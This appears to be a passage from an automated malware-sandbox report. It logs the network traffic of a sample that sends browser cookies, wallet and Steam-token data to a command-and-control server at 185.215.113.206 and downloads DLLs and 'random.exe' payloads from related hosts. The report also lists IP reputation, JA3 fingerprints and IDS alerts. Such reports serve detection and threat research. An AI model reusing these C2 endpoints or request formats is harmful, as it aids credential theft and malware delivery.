Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJDAKEGDBFHCAAKJJJDHost: 185.215.113.206Content-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 4b 45 47 44 42 46 48 43 41 41 4b 4a 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 4b 45 47 44 42 46 48 43 41 41 4b 4a 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 4b 45 47 44 42 46 48 43 41 41 4b 4a 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 4b 45 47 44 42 46 48 43 41 41 4b 4a 4a 4a 44 2d 2d 0d 0a Data Ascii: ------DHJDAKEGDBFHCAAKJJJDContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------DHJDAKEGDBFHCAAKJJJDContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------DHJDAKEGDBFHCAAKJJJDContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------DHJDAKEGDBFHCAAKJJJD--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJECFIECBGDGCAAAEHIHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 2d 2d 0d 0a Data Ascii: ------JJJECFIECBGDGCAAAEHIContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------JJJECFIECBGDGCAAAEHIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JJJECFIECBGDGCAAAEHIContent-Disposition: form-data; name="file"------JJJECFIECBGDGCAAAEHI--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDHCBAEHJJJKKFIDGHJEHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 2d 2d 0d 0a Data Ascii: ------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="file"------JDHCBAEHJJJKKFIDGHJE--
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEGHJJDGHCAKEBGIJKJHost: 185.215.113.206Content-Length: 1003Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCFCAAAAFBAKEBFBAKKHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 46 43 41 41 41 41 46 42 41 4b 45 42 46 42 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 43 41 41 41 41 46 42 41 4b 45 42 46 42 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 43 41 41 41 41 46 42 41 4b 45 42 46 42 41 4b 4b 2d 2d 0d 0a Data Ascii: ------CFCFCAAAAFBAKEBFBAKKContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------CFCFCAAAAFBAKEBFBAKKContent-Disposition: form-data; name="message"wallets------CFCFCAAAAFBAKEBFBAKK--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIDAFBFBKFHJJKEHIEGHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 2d 2d 0d 0a Data Ascii: ------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="message"files------KFIDAFBFBKFHJJKEHIEG--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGIDHJKKJDGCBGCGIJKHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 2d 2d 0d 0a Data Ascii: ------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="file"------KEGIDHJKKJDGCBGCGIJK--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJJDBAEHIJKJKEBFIEGHHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 2d 2d 0d 0a Data Ascii: ------IJJDBAEHIJKJKEBFIEGHContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------IJJDBAEHIJKJKEBFIEGHContent-Disposition: form-data; name="message"ybncbhylepme------IJJDBAEHIJKJKEBFIEGH--
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEGIDGDGHCAAAAKKFCGHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 47 49 44 47 44 47 48 43 41 41 41 41 4b 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 49 44 47 44 47 48 43 41 41 41 41 4b 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 49 44 47 44 47 48 43 41 41 41 41 4b 4b 46 43 47 2d 2d 0d 0a Data Ascii: ------JKEGIDGDGHCAAAAKKFCGContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------JKEGIDGDGHCAAAAKKFCGContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JKEGIDGDGHCAAAAKKFCG--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 35 32 37 37 33 42 32 35 43 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB52773B25C82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 185.215.113.16 185.215.113.16

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49706 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49735 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49737 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49742 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49743 -> 172.67.165.166:443

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49736 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB6CC60 PR_Recv,

0_2_6CB6CC60

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=lmDFwrhCuHnRvEP&MD=nmXmm8Lk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=lmDFwrhCuHnRvEP&MD=nmXmm8Lk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16

Source: global traffic	DNS traffic detected: DNS query: www.google.com
